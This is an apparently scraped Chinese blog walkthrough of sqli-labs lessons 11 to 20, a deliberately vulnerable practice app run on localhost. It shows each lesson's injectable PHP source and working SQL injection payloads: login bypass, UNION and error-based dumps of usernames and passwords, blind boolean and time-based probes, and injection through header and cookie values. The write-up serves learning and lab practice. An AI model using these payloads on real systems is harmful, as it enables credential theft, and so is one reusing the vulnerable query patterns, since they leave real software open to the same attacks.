您的位置:首页 > 数据库

SQLI-LAB  的 实战记录(Less 11 - Less 20)

2016-07-15 20:55 387 查看
Less - 11 Error Based- String
Test

Sourse Code

Solution

Less - 12 Error Based- Double quotes- String
Test

Sourse Code

Solution

Less - 13 Double Injection- String- with twist
Test

Sourse Code

Solution

Less - 14 Double Injection- Double quotes- String
Test

Sourse Code

Solution

Less - 15 Blind- Boolian Based- String
Test

Sourse Code

Solution

Less - 16 Blind- Time Based- Double quotes- String
Test

Sourse Code

Solution

Less - 17 Update Query- Error based - String
Test

Sourse Code

Solution

Less - 18 Header Injection- Error Based- string
Test

Sourse Code

Solution

Less - 19 Header Injection- Referer- Error Based- string
Test

Sourse Code

Solution

Less - 20 POST - Cookie injections - Uagent field - error based
Test

Sourse Code

Solution

以下内容 只是本人在做 sqli-lab 练习时 写下的记录,仅供参考。

因为本人学过一些 sql注入 的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 11 Error Based- String

(第11课:基于错误 - 字符型)

Test:

http://localhost/sqli-lab/Less-11/index.php uname=' &passwd=' &submit=Submit


注:这个是报错的。

建议用火狐浏览器的HackBar或者Burp来做测试

POST 格式 是用 Burp 截的,其实变量名可以直接右键看网页的源代码。

听说过万能密码么?可以考虑使用

Sourse Code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo '<img src="../images/flag.jpg"  />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}


Solution:

uname= ' or '1'='1 &passwd=  ' or '1'='1 &submit=Submit

uname= ' or 1=1 --+ &passwd= ' or 1=1 --+ &submit=Submit

uname= ' or 1=1 # &passwd= ' or 1=1 # &submit=Submit

其它:

uname= ' union select database(),6  --+ &passwd= ' union select database(),6  --+ &submit=Submit

uname= ' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 --+ &passwd= '  --+ &submit=Submit

uname= ' union select (select group_concat(username) from security.users),6 --+ &passwd= '  --+ &submit=Submit


Less - 12 Error Based- Double quotes- String

(第12课:基于错误 - 双引号 - 字符串)

Test:

http://localhost/sqli-lab/Less-12/index.php uname= ") &passwd= " &submit=Submit


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”) and password=(” ” “) LIMIT 0,1’ at line 1

注:直接就指出了 
$uname
$passwd
周围是双引号和一层括号

Sourse Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo<
4000
/span> '<img src="../images/flag.jpg"   />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"   />';
}


Solution:

uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit

uname= ") or 1=1 # &passwd= ") or 1=1 # &submit=Submit

其它:

uname= ") union select database(),6 # &passwd= ") or 1=1 # &submit=Submit

uname= ") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 # &passwd= ") or 1=1 # &submit=Submit

uname= ") union select (select group_concat(username) from security.users),6 # &passwd= ") or 1=1 # &submit=Submit


Less - 13 Double Injection- String- with twist

(第13课:双注入 - 字符型 - 变形)

Test:

http://localhost/sqli-lab/Less-13/index.php uname= 0' &passwd= 0' &submit=Submit


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘0’ ‘) LIMIT 0,1’ at line 1

注:直接就指出了 
$uname
$passwd
周围是单引号和一层括号

Sourse Code:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg"   />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"   />';
}


Solution:

uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit

uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit

其它:

uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit


Less - 14 Double Injection- Double quotes- String

(第14课:双注入 - 双引号 - 字符串)

Test:

http://localhost/sqli-lab/Less-14/index.php uname= "&passwd=' &submit=Submit


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” ” LIMIT 0,1’ at line 1

注:能看出 
$uname
$passwd
周围只有双引号

Sourse Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"  />';
}


Solution:

uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit

uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit

uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit

其它:

uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select c
f9cd
oncat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit


Less - 15 Blind- Boolian Based- String

(第15课:盲注 - 基于布尔值 - 字符串)

Test:

http://localhost/sqli-lab/Less-15/index.php uname="  or 1=1 # &passwd=" or 1=1 # &submit=Submit
uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit


注:第一个错了,第二个对了,被单引号包围,没有回显,考虑盲注。

Sourse Code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg"  />';
}else{
echo '<img src="../images/slap.jpg"   />';
}


Solution:

uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit

uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit

其它:

uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit

uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit


Less - 16 Blind- Time Based- Double quotes- String

(第16课:盲注 - 基于时间 - 双引号 - 字符串)

Test:

http://localhost/sqli-lab/Less-16/index.php uname=' or 1=1 # &passwd=' or 1=1 #&submit=Submit
uname=") or 1=1 # &passwd=") or 1=1 # &submit=Submit


注:第一个错了,第二个对了,被双引号包围,没有回显,考虑盲注。

它的回显图片暴露了对错,所以是基于布尔值或是基于时间都行。

Sourse Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg"  />';
}else{
echo '<img src="../images/slap.jpg"  />';
}


Solution:

uname=") or ("1")=("1 &passwd=") or ("1")=("1 &submit=Submit

uname=") or 1=1 or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit

其它:

uname=") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit

uname=") or (ascii(substr((select database()) ,1,1))) = 115  or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit


Less - 17 Update Query- Error based - String

(第17课:更新查询 - 基于错误 - 字符串)

Test:

http://localhost/sqli-lab/Less-17/index.php[/code] 
注:标题是密码重置,输入框就一个用户名,一个新密码,猜对用户名就好

Sourse Code:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
if (mysql_error()){
print_r(mysql_error());
}else{
}
echo '<img src="../images/flag1.jpg"   />';
}else{
echo '<img src="../images/slap1.jpg"   />';
}


注:对 
$uname
$passwd
字段有检查

Solution:
uname=admin&passwd=666&submit=Submit

其它:

uname=Dumb&passwd=666&submit=Submit

uname=Angelina&passwd=666&submit=Submit

uname=secure&passwd=666&submit=Submit


Less - 18 Header Injection- Error Based- string
(第18课: 头部注入 - 基于错误 - 字符串)

Test:
http://localhost/sqli-lab/Less-18/index.php uname=admin&passwd=admin&submit=Submit


Your IP ADDRESS is: 127.0.0.1

Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

注:建议使用火狐的Modify Headers 或 Burp 修改 user-agent的值

已经将上一次练习中动过的 数据库的值改回来了。

Sourse Code:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
echo 'Your User Agent is: ' .$uagent;
print_r(mysql_error());
echo '<img src="../images/flag.jpg"  />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"   />';
}


注:对 
$uname
$passwd
字段有检查

Solution:
' or '1' = '1

其它:

' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1


注:以上是user agent 的值,基于时间的盲注,如果不对会延时5s

Less - 19 Header Injection- Referer- Error Based- string
(第19课:头部注入 - Referer字段 - 基于错误- 字符串 )

Test:
http://localhost/sqli-lab/Less-19/index.php uname=admin&passwd=admin&submit=Submit


Your IP ADDRESS is: 127.0.0.1

Your Referer is:

注:建议使用火狐的Modify Headers 或 Burp 修改 referer的值

Sourse Code:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
echo 'Your Referer is: ' .$uagent;
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"  />';
}


注:对 
$uname
$passwd
字段有检查

Solution:
' or '1' = '1

其它:

' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1


注:以上是referer 的值,基于时间的盲注,如果不对,会延时5s

Less - 20 POST - Cookie injections - Uagent field - error based
(第20课:POST – cookie 注入 - Uagent字段 - 基于错误)

Test:
http://localhost/sqli-lab/Less-20/index.php uname=Dumb&passwd=Dumb&submit=Submit


注:先登录,比如你知道一个账号 uname:Dumb,pwd:Dumb

登录以后会显示用户名  密码  Id  cookie  IP地址  User Agent。

可以使用火狐浏览器的Firebug来修改cookie中
$uname
的值。

记得把过期时间也改了,不然刚改完
$uname
的值,cookie就过期了。。。

Sourse Code:
无cookie时 登录部分
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1){
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
有cookie时 登录部分
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result){
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo 'Your ID:' .$row['id'];
}else{
echo '<img src="../images/slap1.jpg" />';
}


注:对 
$uname
$passwd
字段有检查,有cookie时 从数据库中显示的数据是 username、password和id

Solution:
Dumb ' or 1=1 #

其它:

' union select 1,database(),6 or 1=1 #

' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

' union select 1,group_concat(username),group_concat(password) from security.users  #


注:以上是cookie中uname的值
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  sqli-lab
相关文章推荐
新的分享
章节导航